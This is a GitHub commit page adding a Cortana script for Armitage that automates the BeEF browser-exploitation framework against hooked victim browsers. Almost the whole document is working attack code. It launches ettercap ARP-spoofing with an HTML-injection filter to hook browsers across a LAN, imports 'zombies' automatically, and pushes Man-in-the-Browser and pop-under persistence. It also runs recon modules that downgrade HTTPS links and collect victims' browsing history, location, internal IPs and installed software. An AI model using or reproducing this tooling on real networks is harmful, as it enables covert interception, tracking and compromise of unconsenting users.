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BeEF and armitage integration 

The purpose of this script is to automate the sending of some  commands of BeEF and allow to control the zombies directly through the intuitive armitage's interface.

The ultimate goal would be to work on armitage as if you was in  the web panel of BeEF.
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benyG committed Sep 7, 2013
1 parent 6493c4e commit 91522c3
Showing 1 changed file with 232 additions and 0 deletions.
232 changes: 232 additions & 0 deletions beef_strike.cna
@@ -0,0 +1,232 @@
# Beef interaction by benyG
# Tested on backtrack5r3
# video demo:

# At this time, This script doesn't use the beef_online command of beef metasploit plugin
# to update zombies list. At result, but it try to reproduce it.
# So if you try to add host while this script is running, you will falsify final result.
# Do your recruitment and Let Beef_strike add host for you.
# work in progress...

on ready {
$console = console();
$console = open_console_tab ("Beef Strike","all","zmb_hook",1);
cmd($console , "load beef");

on console_load {show_message("$3");
append($console, "\c5 /!\\ You may need to connect to BeEF Server");}
# on console_beef_connect {show_message("$3");}

$first = 0 ; # first beef's zombie id
@beef_hosts = @(%()); # array of beef's zombies

popup attacks {
menu "BeEF Strike"{

# iten "e" {cmd($console, "beef_online");
# @beef_zb = @(%());
# @beef_zb = parse_table("",);
# }

item "Connect" {
# Default value of Auto-import & Client-side auto-recon.
$import = 1;
$recon = 1;
cmd($console , "beef_disconnect");
$url = prompt_text("beef server URL","");
$user = prompt_text("User","beef");
$pass = prompt_text("Password","beef");
cmd($console , "beef_connect $url $user $pass");

menu "Recruitment" {
#use ettercap filter for html injection - low injection success rate.
item "ettercap method" {
$eth0 = prompt_text("Network interface of the LAN to infect","eth0");
$filter = prompt_text("Put the absolute path of your filter","/opt/metasploit/msf3/data/armitage/cortana-scripts/beef_strike/infect.filter");
cmd_async(" xterm -e 'etterfilter $filter -o html.ef'");
cmd_async(" xterm -e 'ettercap -T -q -i $eth0 -F html.ef -M ARP // //'");
show_message("ettercap filter > Contamination beging ...");
item "mitmproxy method"{
# this feature will use iframe_injector script from mitmproxy to increase injection success rate.
show_message("Feature in dev.");
# [recruitment method idea]
# xsser method for find xss vulns and auto add beef hooks.
# spear phishing campaign.

item "Zombies" {
$zombitable = open_table_tab("zombies", "", @("id", "address"), @(), @("Refresh"), "zmb_hook", 1);

menu "Auto import" {
# import new zombies automatically in the metasploit database.
item "ON" {
append($console, "\c9 [*] Auto import enable"); $import = 1 ;
item "OFF" {
append($console, "\c4 [*] Auto import disable"); $import = 0 ;

menu "Client-side auto recon." {
# Automatically drive client-side reconnaissance once a new zombie appear.
item "ON" {
append($console, "\c9 [*] Client-side auto recon. enable");
$recon = 1 ;
item "OFF" {
append($console, "\c4 [*] Client-side auto recon. disable"); $recon = 0 ;

item "BeEF-Console" {
$console = open_console_tab ("Beef Strike","all","zmb_hook",1);
cmd($console , "load beef");
cmd($console , "beef_connect $url $user $pass");

item "web UI panel" {
$urlpanel = "/ui/panel";
url_open("$url $+ $urlpanel");

item "Disconnect" {
cmd($console , "beef_disconnect");
cmd($console , "load beef");

#when zombie is offline icon must turn red.
#filter host_image {
# $address = $2['address'];
# push($1, script_resource("zombie.png"));
# return @_;
# }

on heartbeat_15s {
if ( $import == 1 ) {
cmd($console , "beef_import");
# cmd($console , "beef online");

popup zmb_hook {
menu "BeEF action" {
item "Information" {
@idr = flatten(table_selected($1, "id"));
$idr = @idr[0];
@adr = flatten(table_selected($1, "address"));
$adr = @adr[0];
append($console, "+----------------------------------------------+");
append($console, "+--- \c7 zombie N° $idr --> $adr ---+");
append($console, "+----------------------------------------------+");

cmd($console , "beef_target -i $idr");
append($console, "+----------------------------------------------+");
# result of this function appear on teamserver console
append($console, "+-----------------> END <--------------------+");
item "Recon." {
@idr = flatten(table_selected($1, "id"));
$idr = @idr[0];
item "Drive-by" {
# Execute beef_target -e $id 27 and send invisible iframe to victim browser-
$inviframe = prompt_text("URL","http://");
cmd($console , "beef_target -e $id 27"); # URL param not in use ...


sub refresh_hosts {
table_set($1, @beef_hosts);

on tab_table_click {
if ($3 eq "Refresh") {

on host_add {
# try to build result of beef_online command.
%newhost = %(id => $first, address => "$1");
$id = %newhost["id"];
$ad = %newhost["address"];
show_message("new zombie > Id: $id -- IP: $ad");
add(@beef_hosts, %newhost, $first);
append($console, "\c9 Send MiTB module for Persistence ------->");
cmd($console , "beef_target -e $id 32"); # MITB Persistence
cmd($console , "beef_target -e $id 30"); # POP-Under Persistence
# feel free to add another persistence module here.

# Drive or not drive auto recon that's the question .
if ( $recon == 1 ) {
# BeEF recon modules deployment
} else {
append($console, "[*]\cB Client-side auto recon. have been disabled \n Drive or not drive auto recon ? that's the question");
$first = $first + 1 ;

sub driverecon {
append($console, "[*]\cB Send client-side recon. modules ------------>");
cmd($console , "beef_target -e $1 101"); # fingerprint browser
cmd($console , "beef_target -e $1 94"); # replace https hrefs by http
cmd($console , "beef_target -e $1 78"); # get visited domains
cmd($console , "beef_target -e $1 79"); # get visited URLs
cmd($console , "beef_target -e $1 107"); # get physical location
cmd($console , "beef_target -e $1 108"); # get location using location API
cmd($console , "beef_target -e $1 115"); # get internal IP (behind NAT)
cmd($console , "beef_target -e $1 110"); # get system information
cmd($console , "beef_target -e $1 113"); # detect installed software (IE only)
append($console, "\cB (!) BeEF say \"Command not send\", don't pay attention.");
# feel free to add another module here to build complete user and system profile ;-)

sub recon_result {
append($console, "[*]\c1 Recon. result ------------>");
append($console, ">\c8 fingerprint browser ");
cmd($console , "beef_target -r $1 101"); # fingerprint browser
append($console, ">\c8 replace https hrefs by http ");
cmd($console , "beef_target -r $1 94"); # replace https hrefs by http
append($console, ">\c8 get visited domains");
cmd($console , "beef_target -r $1 78"); # get visited domains
append($console, ">\c8 get visited URLs");
cmd($console , "beef_target -r $1 79"); # get visited URLs
append($console, ">\c8 get physical location");
cmd($console , "beef_target -r $1 107"); # get physical location
append($console, ">\c8 get location using location API ");
cmd($console , "beef_target -r $1 108"); # get location using location API
append($console, ">\c8 get internal IP (behind NAT) ");
cmd($console , "beef_target -r $1 115"); # get internal IP (behind NAT)
append($console, ">\c8 get system information");
cmd($console , "beef_target -r $1 110"); # get system information
append($console, ">\c8 detect installed software (IE only)");
cmd($console , "beef_target -r $1 113"); # detect installed software (IE only)
append($console, "\c8 :-)");

# on console_beef_online{
# @online = parse_table($3, @("Id", "IP", "OS"));
# println(@online);
# append($console, "@online");
# foreach $nReports (@online) {
# ($Id, $IP, $OS) = values($online, @('Id', 'IP', 'OS'));
# show_message($Id);
# }
# }

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